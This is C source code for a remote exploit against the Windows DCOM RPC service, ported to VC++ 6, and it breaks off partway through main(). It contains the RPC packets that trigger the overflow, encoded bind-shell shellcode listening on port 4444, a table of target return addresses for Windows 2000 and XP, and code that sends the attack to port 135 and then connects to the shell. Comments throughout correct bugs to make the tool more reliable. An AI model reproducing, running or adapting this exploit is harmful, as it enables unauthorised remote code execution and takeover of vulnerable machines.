DCOM RPC remote win32 exploit, ported to Windows for compilation with VC++ 6. The return address is not searched for at runtime: it is picked with -t from a built-in table of per-target "magic" offsets. Ported by Lordy
132c24caa22412268215f455fb5e2eb14b4e96dd8f2b7f5f467245ef0395479e
/*
**
** 2003/07/27 - DCOM RPC WIN32 remote exploit (Most languages)
** 2003/12/14 - PORT TO WIN32 COMPILERS
**
** Added Universal Offsets for Win2k and WinXP
**
**
** Lordy's Version - ICQ(7557843)
** Lordillusions Company(C)
**
**
** Should work fine with VC++ 6
*/
#include <process.h>
#include <stdio.h>
#include <stdlib.h>
#include <memory.h>
//#include <winsock2.h>
#include <windows.h>
#include <io.h>
#include <lm.h>
#include <string.h>
#define RECVTIMEOUT 1
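/* getopt() state, with the names and meaning of the POSIX globals. */
char *optarg = NULL;   /* argument of the option just returned, or NULL          */
int optind = 1;        /* index of the next argv element to be scanned           */
int opterr = 1;        /* non-zero: report bad options as '?' instead of the letter */

/*
 * Minimal getopt() for compilers that have no <unistd.h> (this port targets
 * VC++ 6).  Both '-' and '/' introduce an option.
 *
 * argc/argv  - the program arguments; scanning starts at argv[optind].
 * opstring   - option letters; a letter followed by ':' takes an argument,
 *              either attached ("-t3") or as the next argv element ("-t 3").
 *
 * Returns the option letter; '?' for an unknown letter, a bare ':' or a
 * missing argument (with opterr == 0: the letter itself, or ':'); EOF at the
 * end of the options, i.e. argv exhausted, a non-option argument (optind is
 * left pointing at it) or a bare "-" / "--".
 *
 * Fix over the original: an argv element that is just "/" used to leave the
 * option letter empty, so strchr(opstring, '\0') matched the terminator and
 * the code then read one byte past the end of opstring.  It is now reported
 * like any other unknown option.
 */
int getopt(int argc, char *argv[], const char *opstring)
{
    static char *cluster = NULL;   /* inside "-abc": the letter returned last time */
    char *opt = NULL;
    char *spec;

    /* Continue a clustered argument from the previous call if letters remain. */
    if (cluster != NULL && *(++cluster) != '\0')
        opt = cluster;

    if (opt == NULL) {
        if (optind >= argc) {
            cluster = NULL;
            return EOF;                 /* argv exhausted */
        }
        opt = argv[optind++];
        if (*opt != '/' && *opt != '-') {
            --optind;                   /* leave the non-option for the caller */
            optarg = NULL;
            cluster = NULL;
            return EOF;
        }
        if (strcmp(opt, "-") == 0 || strcmp(opt, "--") == 0) {
            optarg = NULL;
            cluster = NULL;
            return EOF;                 /* explicit end of options */
        }
        opt++;                          /* step over the '-' or '/' */
    }

    if (*opt == ':')
        return opterr ? '?' : ':';

    /* Empty letter (argv element was just "/"): never look it up in opstring. */
    if (*opt == '\0') {
        optarg = NULL;
        cluster = NULL;
        return '?';
    }

    spec = strchr(opstring, *opt);
    if (spec == NULL) {
        optarg = NULL;
        cluster = NULL;
        return opterr ? '?' : (int)*opt;
    }

    if (spec[1] != ':') {
        /* Plain flag: stay inside this argv element for the next call. */
        optarg = NULL;
        cluster = opt;
        return (int)*opt;
    }

    /* Option with a required argument. */
    if (opt[1] != '\0') {
        optarg = &opt[1];               /* attached form, "-t3" */
    } else if (optind < argc) {
        optarg = argv[optind++];        /* separate form, "-t 3" */
    } else {
        optarg = NULL;                  /* argument missing */
        cluster = NULL;
        return opterr ? '?' : (int)*opt;
    }
    cluster = NULL;
    return (int)*opt;
}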
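/*
 * Zero 'length' bytes at 'b'.  Thin wrapper over memset(), kept for the call
 * in sexsock().
 *
 * The original was a K&R-style definition taking char *, which gave callers
 * no prototype at all (sexsock() passes a pointer to an array).  void *
 * accepts any object pointer, as the BSD bzero() does.  A NULL pointer or a
 * non-positive length is a no-op instead of an invalid or huge memset().
 */
void bzero(void *b, int length)
{
    if (b == NULL || length <= 0)
        return;
    memset(b, 0, (size_t)length);
}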
/***************************************************************/
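/*
 * Resolve 'hostname' (dotted quad or DNS name) to an IPv4 address in network
 * byte order, i.e. the s_addr value sexsock() stores in its sockaddr_in.
 * On failure it prints a message, tears Winsock down and exits the process,
 * so callers never see an error return.
 *
 * Fixes over the original: inet_addr() failure is detected by comparing with
 * INADDR_NONE instead of testing a signed long for < 0 (on x86 that test is
 * also true for every valid address whose last octet is >= 128, which then
 * silently took the gethostbyname() path); the gethostbyname() result is
 * checked to be an IPv4 address that fits the destination before memcpy().
 * Caveat: the literal 255.255.255.255 is indistinguishable from INADDR_NONE.
 */
long gimmeip(char *hostname)
{
    struct hostent *he;
    unsigned long ipaddr;

    ipaddr = inet_addr(hostname);
    if (ipaddr == INADDR_NONE) {
        he = gethostbyname(hostname);
        if (he == NULL || he->h_addrtype != AF_INET || he->h_addr == NULL
            || he->h_length <= 0 || (size_t)he->h_length > sizeof(ipaddr)) {
            printf("[x] Failed to resolve host: %s! Exiting...\n\n", hostname);
            WSACleanup();
            exit(1);
        }
        ipaddr = 0;
        memcpy(&ipaddr, he->h_addr, (size_t)he->h_length);
    }
    return (long)ipaddr;
}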
/*
 * First PDU sent on the connection (main() sends it, then reads one reply
 * before sending the attack buffer).  Given its name and the leading
 * 0x05 / 0x0B bytes this appears to be a DCE/RPC "bind" carrying the
 * interface and transfer-syntax UUIDs the payload is built for — field
 * meanings are from the DCE/RPC header layout, not verified here.
 * Sent verbatim; nothing in this file patches it.
 */
u_char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,
0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,
0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,
0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00
};
/*
 * Head of the attack request; main() copies it to the start of atk_bf and
 * then adds (sizeof(shellcode) - 12) to the 32-bit little-endian words at
 * buffer offsets 8, 16, 128, 132, 180, 184, 208 and 396 — all of which fall
 * inside this array — so the bytes on the wire differ from this literal.
 * Offsets 8 and 16 sit where a DCE/RPC request header keeps frag_length
 * and alloc_hint; the remaining ones look like embedded length/offset
 * fields of the marshalled object stream (not verified here).
 */
u_char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,
0xE8,0x03,0x00,0x00,0xE5,0x00,0x00,0x00,
0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,
0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,
0xCC,0x45,0x64,0x49,0xB0,0x70,0xDD,0xAE,
0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,
0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,
0x7C,0x5E,0x0D,0x00,0x00,0x00,0x00,0x00,
0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,
0x2A,0x4D,0xCE,0x11,0xA6,0x6A,0x00,0x20,
0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,
0x4D,0x41,0x52,0x42,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,
0x00,0x00,0x00,0x00,0xA8,0xF4,0x0B,0x00,
0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,
0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,
0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,
0x28,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0xC8,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,
0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,
0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,
0x64,0x29,0xCD,0x00,0x00,0x00,0x00,0x00,
0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,
0x60,0x00,0x00,0x00,0x58,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,
0x20,0x00,0x00,0x00,0x78,0x00,0x00,0x00,
0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,
0xFF,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,
0x06,0x09,0x02,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x78,0x19,0x0C,0x00,
0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,
0x01,0x00,0x00,0x00,0x70,0xD8,0x98,0x93,
0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,
0xB2,0x00,0x00,0x00,0x32,0x00,0x31,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x80,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,
0x60,0x00,0x00,0x00,0x60,0x00,0x00,0x00,
0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,
0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x3B,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x30,0x00,0x00,0x00,
0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,
0x80,0x0E,0xE9,0x4A,0x99,0x99,0xF1,0x8A,
0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x30,0x00,0x00,0x00,0x78,0x00,0x6E,0x00,
0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,
0x46,0x00,0x58,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x10,0x00,0x00,0x00,0x30,0x00,0x2E,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x68,0x00,0x00,0x00,0x0E,0x00,0xFF,0xFF,
0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
/*
 * 16 bytes placed between request1 and the shellcode.  main() adds
 * sizeof(shellcode)/2 (the shellcode's length in UTF-16 units) to the
 * 32-bit words at offsets 0 and 8 — both 0x20 here — and does so on this
 * global array IN PLACE before copying it, so building the buffer a second
 * time in the same process would double the shift.  The trailing 0x5C,0x00
 * pair is the start of the UTF-16 path continued in the shellcode/request3.
 */
u_char request2[]=
{
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x20,0x00,0x00,0x00,0x5C,0x00,0x5C,0x00
};
/*
 * Trailer copied right after the shellcode: the UTF-16LE string
 * "\C$\123456" followed by fifteen '1' characters and ".doc", with its
 * terminating NUL.  Not patched at runtime.
 */
u_char request3[]=
{
0x5C,0x00,0x43,0x00,0x24,0x00,0x5C,0x00,
0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,
0x35,0x00,0x36,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x2E,0x00,0x64,0x00,0x6F,0x00,
0x63,0x00,0x00,0x00
};
/*
 * Last 48 bytes of the attack buffer, appended after request3.  Sent as-is;
 * none of the offsets main() fixes up reach this far.
 */
u_char request4[]=
{
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,
0x00,0x00,0x00,0x00,0x88,0x2A,0x0C,0x00,
0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x28,0x8C,0x0C,0x00,0x01,0x00,0x00,0x00,
0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
/*
 * Payload inserted between request2 and request3.  Layout as visible here:
 *   [0..35]   UTF-16 filler ("FXNBFXFXNBFX...")
 *   [36..39]  0xFFFFFFFF — overwritten by main() with the selected target's
 *             retloc_jmp_esp (memcpy at shellcode+36); this is the only byte
 *             range in the array that is patched
 *   [40..47]  0x7FFDE0CC twice (little-endian); presumably a fixed pointer
 *             the stack frame expects — not verified here
 *   then a run of 0x90 (NOP sled) and an encoded shellcode starting at the
 *   0xEB,0x19 short jump.
 * The listening port is baked into the encoded bytes: the -b option only
 * changes the port this client connects to afterwards, it does NOT patch
 * the shellcode, so anything other than 4444 will not find the shell.
 */
u_char shellcode[]=
{
/* port 4444 bind shellcode (hard-coded; see note above) */
0x46,0x00,0x58,0x00,0x4e,0x00,0x42,0x00,
0x46,0x00,0x58,0x00,0x46,0x00,0x58,0x00,
0x4e,0x00,0x42,0x00,0x46,0x00,0x58,0x00,
0x46,0x00,0x58,0x00,0x46,0x00,0x58,0x00,
0x46,0x00,0x58,0x00,0xff,0xff,0xff,0xff,
0xcc,0xe0,0xfd,0x7f,0xcc,0xe0,0xfd,0x7f,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xeb,
0x19,0x5e,0x31,0xc9,0x81,0xe9,0x89,0xff,
0xff,0xff,0x81,0x36,0x80,0xbf,0x32,0x94,
0x81,0xee,0xfc,0xff,0xff,0xff,0xe2,0xf2,
0xeb,0x05,0xe8,0xe2,0xff,0xff,0xff,0x03,
0x53,0x06,0x1f,0x74,0x57,0x75,0x95,0x80,
0xbf,0xbb,0x92,0x7f,0x89,0x5a,0x1a,0xce,
0xb1,0xde,0x7c,0xe1,0xbe,0x32,0x94,0x09,
0xf9,0x3a,0x6b,0xb6,0xd7,0x9f,0x4d,0x85,
0x71,0xda,0xc6,0x81,0xbf,0x32,0x1d,0xc6,
0xb3,0x5a,0xf8,0xec,0xbf,0x32,0xfc,0xb3,
0x8d,0x1c,0xf0,0xe8,0xc8,0x41,0xa6,0xdf,
0xeb,0xcd,0xc2,0x88,0x36,0x74,0x90,0x7f,
0x89,0x5a,0xe6,0x7e,0x0c,0x24,0x7c,0xad,
0xbe,0x32,0x94,0x09,0xf9,0x22,0x6b,0xb6,
0xd7,0x4c,0x4c,0x62,0xcc,0xda,0x8a,0x81,
0xbf,0x32,0x1d,0xc6,0xab,0xcd,0xe2,0x84,
0xd7,0xf9,0x79,0x7c,0x84,0xda,0x9a,0x81,
0xbf,0x32,0x1d,0xc6,0xa7,0xcd,0xe2,0x84,
0xd7,0xeb,0x9d,0x75,0x12,0xda,0x6a,0x80,
0xbf,0x32,0x1d,0xc6,0xa3,0xcd,0xe2,0x84,
0xd7,0x96,0x8e,0xf0,0x78,0xda,0x7a,0x80,
0xbf,0x32,0x1d,0xc6,0x9f,0xcd,0xe2,0x84,
0xd7,0x96,0x39,0xae,0x56,0xda,0x4a,0x80,
0xbf,0x32,0x1d,0xc6,0x9b,0xcd,0xe2,0x84,
0xd7,0xd7,0xdd,0x06,0xf6,0xda,0x5a,0x80,
0xbf,0x32,0x1d,0xc6,0x97,0xcd,0xe2,0x84,
0xd7,0xd5,0xed,0x46,0xc6,0xda,0x2a,0x80,
0xbf,0x32,0x1d,0xc6,0x93,0x01,0x6b,0x01,
0x53,0xa2,0x95,0x80,0xbf,0x66,0xfc,0x81,
0xbe,0x32,0x94,0x7f,0xe9,0x2a,0xc4,0xd0,
0xef,0x62,0xd4,0xd0,0xff,0x62,0x6b,0xd6,
0xa3,0xb9,0x4c,0xd7,0xe8,0x5a,0x96,0x80,
0xae,0x6e,0x1f,0x4c,0xd5,0x24,0xc5,0xd3,
0x40,0x64,0xb4,0xd7,0xec,0xcd,0xc2,0xa4,
0xe8,0x63,0xc7,0x7f,0xe9,0x1a,0x1f,0x50,
0xd7,0x57,0xec,0xe5,0xbf,0x5a,0xf7,0xed,
0xdb,0x1c,0x1d,0xe6,0x8f,0xb1,0x78,0xd4,
0x32,0x0e,0xb0,0xb3,0x7f,0x01,0x5d,0x03,
0x7e,0x27,0x3f,0x62,0x42,0xf4,0xd0,0xa4,
0xaf,0x76,0x6a,0xc4,0x9b,0x0f,0x1d,0xd4,
0x9b,0x7a,0x1d,0xd4,0x9b,0x7e,0x1d,0xd4,
0x9b,0x62,0x19,0xc4,0x9b,0x22,0xc0,0xd0,
0xee,0x63,0xc5,0xea,0xbe,0x63,0xc5,0x7f,
0xc9,0x02,0xc5,0x7f,0xe9,0x22,0x1f,0x4c,
0xd5,0xcd,0x6b,0xb1,0x40,0x64,0x98,0x0b,
0x77,0x65,0x6b,0xd6,0x93,0xcd,0xc2,0x94,
0xea,0x64,0xf0,0x21,0x8f,0x32,0x94,0x80,
0x3a,0xf2,0xec,0x8c,0x34,0x72,0x98,0x0b,
0xcf,0x2e,0x39,0x0b,0xd7,0x3a,0x7f,0x89,
0x34,0x72,0xa0,0x0b,0x17,0x8a,0x94,0x80,
0xbf,0xb9,0x51,0xde,0xe2,0xf0,0x90,0x80,
0xec,0x67,0xc2,0xd7,0x34,0x5e,0xb0,0x98,
0x34,0x77,0xa8,0x0b,0xeb,0x37,0xec,0x83,
0x6a,0xb9,0xde,0x98,0x34,0x68,0xb4,0x83,
0x62,0xd1,0xa6,0xc9,0x34,0x06,0x1f,0x83,
0x4a,0x01,0x6b,0x7c,0x8c,0xf2,0x38,0xba,
0x7b,0x46,0x93,0x41,0x70,0x3f,0x97,0x78,
0x54,0xc0,0xaf,0xfc,0x9b,0x26,0xe1,0x61,
0x34,0x68,0xb0,0x83,0x62,0x54,0x1f,0x8c,
0xf4,0xb9,0xce,0x9c,0xbc,0xef,0x1f,0x84,
0x34,0x31,0x51,0x6b,0xbd,0x01,0x54,0x0b,
0x6a,0x6d,0xca,0xdd,0xe4,0xf0,0x90,0x80,
0x2f,0xa2,0x04,0x00
};
/*
 * One selectable target: the menu number typed after -t, its label, and
 * the 32-bit address main() writes over the 0xFFFFFFFF slot at shellcode+36.
 */
struct os_plat_pk
{
int op_pk_num;            /* -t value; 0x82 marks the end of the table        */
char *op_pk_str;          /* label printed by pri_usg() and at "[*] Target:"  */
u_long retloc_jmp_esp;    /* return address; named as a jmp esp, not verified */
};
/*
 * Target table indexed directly by the -t number (main() uses the number as
 * the array index, so op_pk_num must equal the row position).  Rows 5 and 6
 * are the "universal" addresses added in the Win32 port; row 5 is the same
 * address as row 0.  The 0x82 row is the sentinel pri_usg() stops at and
 * must stay last.
 */
struct os_plat_pk __pt_pkg_form[]=
{
{0,"Windows 2000 magic version 1",0x0018759F},
{1,"Windows 2000 magic version 2",0x001875E3},
{2,"Windows 2000 magic version 3",0x001F0CD0},
{3,"Windows 2000 magic version 4",0x010016C6},
{4,"Windows 2000 magic version 5",0x010016CB},
{5,"[Win2k Universal]", 0x0018759F },
{6,"[WinXP Universal]", 0x0100139d },
{0x82,NULL,0}
};
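#define DEF_STR "It's test"   /* placeholder hostname: main() treats it as "no -h given" */
#define DEF_BF (0x1000)       /* size of the receive and attack buffers in main()        */
#define DEF_SZ (0xff)         /* capacity of the hostname buffer                         */
#define GET_SZ (0x400)        /* unused                                                  */

/* Connect a TCP socket to conn_host_nm:conn_port_nm; returns it, or -1 on failure. */
int sexsock(char *conn_host_nm, int conn_port_nm);
/* Relay stdin/stdout to and from the shell on st_sock_va until it closes. */
void start_shell(int st_sock_va);
/* Exit with a message if st_sock_va is the -1 failure value from sexsock(). */
void re_connt_lm(int st_sock_va);
/* Print usage plus the -t target menu, then exit. */
void pri_usg(char *f_nm);
/* Print the banner.  (void) so the prototype actually checks the call. */
void pri_banrl(void);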
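/* Selectable targets: every __pt_pkg_form row except the 0x82 sentinel. */
#define NUM_TARGETS ((int)(sizeof(__pt_pkg_form) / sizeof(__pt_pkg_form[0])) - 1)

/*
 * Add 'delta' to the 32-bit little-endian word at buf[off].  Replaces the
 * old QIK_SHIFT macro, which did the same through an unaligned u_long* cast
 * into a u_char array (x86 tolerates it, but it is aliasing UB).
 */
static void add_u32_at(u_char *buf, size_t off, u_long delta)
{
    u_char *p = buf + off;
    u_long v = (u_long)p[0] | ((u_long)p[1] << 8)
             | ((u_long)p[2] << 16) | ((u_long)p[3] << 24);

    v += delta;
    p[0] = (u_char)(v & 0xff);
    p[1] = (u_char)((v >> 8) & 0xff);
    p[2] = (u_char)((v >> 16) & 0xff);
    p[3] = (u_char)((v >> 24) & 0xff);
}

/*
 * Parse a decimal option argument into *out, rejecting junk and values
 * outside [lo, hi].  Returns 0 on success, -1 otherwise (atoi() used to turn
 * "abc" into 0 silently).
 */
static int parse_int(const char *s, long lo, long hi, long *out)
{
    char *end;
    long v;

    if (s == NULL || *s == '\0')
        return -1;
    v = strtol(s, &end, 10);
    if (*end != '\0' || v < lo || v > hi)
        return -1;
    *out = v;
    return 0;
}

/*
 * Assemble the attack PDU into 'out' (capacity 'cap'):
 *     request1 | request2 | shellcode | request3 | request4
 * with retloc_jmp_esp written over the 0xFFFFFFFF slot at shellcode+36 and
 * the length words adjusted for the shellcode size.  Returns the byte count,
 * or -1 if the pieces would not fit.
 *
 * Like the original it patches the global request2 and shellcode arrays in
 * place, so it must be called only once per process.
 */
static int build_attack(u_char *out, size_t cap, u_long retloc_jmp_esp)
{
    /* Words inside the request1 part that grow with the shellcode; 8 and 16
     * sit where a DCE/RPC request keeps frag_length and alloc_hint. */
    static const size_t fixups[] = { 8, 16, 128, 132, 180, 184, 208, 396 };
    size_t len = 0, i;
    size_t total = sizeof(request1) + sizeof(request2) + sizeof(shellcode)
                 + sizeof(request3) + sizeof(request4);
    u_long shift;

    if (total > cap)
        return -1;

    /* Return address, little-endian, as the old memcpy of a u_long did on x86. */
    shellcode[36] = (u_char)(retloc_jmp_esp & 0xff);
    shellcode[37] = (u_char)((retloc_jmp_esp >> 8) & 0xff);
    shellcode[38] = (u_char)((retloc_jmp_esp >> 16) & 0xff);
    shellcode[39] = (u_char)((retloc_jmp_esp >> 24) & 0xff);

    /* request2 carries two lengths that grow by the shellcode's UTF-16 length. */
    shift = (u_long)(sizeof(shellcode) / 2);
    add_u32_at(request2, 0, shift);
    add_u32_at(request2, 8, shift);

    memcpy(out + len, request1, sizeof(request1));   len += sizeof(request1);
    memcpy(out + len, request2, sizeof(request2));   len += sizeof(request2);
    memcpy(out + len, shellcode, sizeof(shellcode)); len += sizeof(shellcode);
    memcpy(out + len, request3, sizeof(request3));   len += sizeof(request3);
    memcpy(out + len, request4, sizeof(request4));   len += sizeof(request4);

    shift = (u_long)(sizeof(shellcode) - 12);
    for (i = 0; i < sizeof(fixups) / sizeof(fixups[0]); i++)
        add_u32_at(out, fixups[i], shift);

    return (int)len;
}

/* Report a failed network step on the exploit connection and exit. */
static void net_fail(int sock, const char *step)
{
    fprintf(stderr, " [-] %s failed (WSA error %d).\n", step, WSAGetLastError());
    closesocket(sock);
    WSACleanup();
    exit(1);
}

/*
 * Entry point.  Parses -h/-p/-b/-t, builds the attack buffer for the chosen
 * target, sends bind + attack to host:port_connect, then connects to
 * host:port_back and relays a shell.
 *
 * Fixes over the original:
 *  - -t was only checked for > 6; a negative value indexed before the table.
 *    The bound now comes from the table itself.
 *  - ports and the target number are range-checked instead of atoi()'d.
 *  - send()/recv() results are checked; a short send or a dropped connection
 *    used to be ignored.
 *  - the exploit socket is closed with closesocket(), not the CRT close().
 *  - Win32 Sleep() takes milliseconds; the Unix original slept 1 s per dot,
 *    and Sleep(1) reconnected before the bind shell could be listening.
 * Note that -b only changes where this client connects: the shellcode is
 * never patched with port_back and listens on its built-in port (4444).
 */
int main(int argc, char *argv[])
{
    int sock, type_def = 0, atk_len, opt, got, i;
    long v;
    u_char get_bf[DEF_BF], atk_bf[DEF_BF];
    char def_host[DEF_SZ] = DEF_STR;
    unsigned short port_connect = 135;   /* RPC endpoint mapper */
    unsigned short port_back = 4444;     /* where the bind shell is expected */

    pri_banrl();
    while ((opt = getopt(argc, argv, "T:t:H:h:P:p:B:b:I:i")) != EOF) {
        switch (opt) {
        case 'T':
        case 't':
            if (parse_int(optarg, 0, NUM_TARGETS - 1, &v) != 0)
                pri_usg(argv[0]);       /* never returns */
            type_def = (int)v;
            break;
        case 'H':
        case 'h':
            memset(def_host, 0, sizeof(def_host));
            strncpy(def_host, optarg, sizeof(def_host) - 1);   /* memset keeps the NUL */
            break;
        case 'P':
        case 'p':
            if (parse_int(optarg, 1, 65535, &v) != 0)
                pri_usg(argv[0]);
            port_connect = (unsigned short)v;
            break;
        case 'B':
        case 'b':
            if (parse_int(optarg, 1, 65535, &v) != 0)
                pri_usg(argv[0]);
            port_back = (unsigned short)v;
            break;
        case 'I':
        case 'i':
        case '?':
        default:
            pri_usg(argv[0]);
            break;
        }
    }
    if (strcmp(def_host, DEF_STR) == 0)
        pri_usg(argv[0]);               /* -h is mandatory */

    fprintf(stdout, " [*] Target: %s.\n", __pt_pkg_form[type_def].op_pk_str);
    fprintf(stdout, " [0] Add return address.\n");
    fprintf(stdout, " [1] Start, shellcode setting.\n");
    atk_len = build_attack(atk_bf, sizeof(atk_bf), __pt_pkg_form[type_def].retloc_jmp_esp);
    if (atk_len < 0) {
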